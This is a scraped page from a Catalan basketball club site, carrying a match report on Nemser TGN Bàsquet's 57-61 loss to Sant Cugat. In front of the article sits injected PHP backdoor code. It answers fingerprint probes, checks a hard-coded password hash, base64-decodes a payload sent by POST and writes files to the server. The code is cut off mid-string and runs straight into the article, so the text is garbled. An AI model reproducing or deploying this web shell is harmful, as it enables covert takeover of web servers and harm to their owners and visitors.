function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser perd contra el Sant Cugat i encaixa la tercera derrota seguida - Tgn Bàsquet Club -

El Nemser perd contra el Sant Cugat i encaixa la tercera derrota seguida

Updated: octubre 14, 2013

El Nemser TGN Bàsquet va encaixar la tercera derrota seguida després de perdre contra el Sant Cugat (57-61) en un partit que va ser dominat per les visitants amb una certa comoditat en la primera meitat (22-27 al descans) però que va donar un gir de 180 graus en el tercer període gràcies a la determinació ofensiva de les locals que van dur la iniciativa durant molts moments. Al final, però, el major encert en els tirs lliures del Sant Cugat (els 8 últims sense errades) van decidir un matx que va acabar sent d’infart.

Els dos primers períodes van ser d’una qualitat ofensiva pobre per part dels dos equips. El Nemser, com en cada partit, va exhibir una condició física excel·lent i una defensa a tota la pista digna de ser admirada, fet que explica que el conjunt lila només perdés de 4 punts en acabar el primer període (11-15). El Nemser no tenia el dia de cara a cistella i va fallar molts tirs còmodes prop del cèrcol que el van deixar en tan sols 22 punts al descans. A la represa, les noies que entrena Juan Carlos Arjona van donar una altra imatge en atac. Els tirs sovintejaven i l’encert va augmentar de manera exponencial i el Nemser va ser capaç, gràcies a un parcial de sortida de 13-4, de donar la volta al resultat (35-31 a 5:32 per finalitzar el període). Amb tot, el Sant Cugat no es va posar nerviós i amb uns últims dos minuts molt inspirats, va arribar a l’inici del quart període sis punts amunt (40-46). El TGN Bàsquet no va llençar la tovallola mai i el partit va entrar en una dinàmica de igualtat que podia atorgar la victòria a qualsevol dels dos equips. En plena lluita pel control del partit i amb 52-53 al marcador, els àrbitres van assenyalar una tècnica a Mari Carme Martí per una suposada desconsideració a una rival tot just després d’una cistella del TGN Bàsquet. El Sant Cugat va anotar els dos tirs lliures (52-55) i, tot i que les locals van arribar a empatar (55-55, a 1:37 del final), les visitants van estar molt fines des de la línia de tirs lliures -el Nemser va tirar més, però amb pitjor percentatge, una de les claus de la derrota- i no van deixar escapar el seu tercer triomf.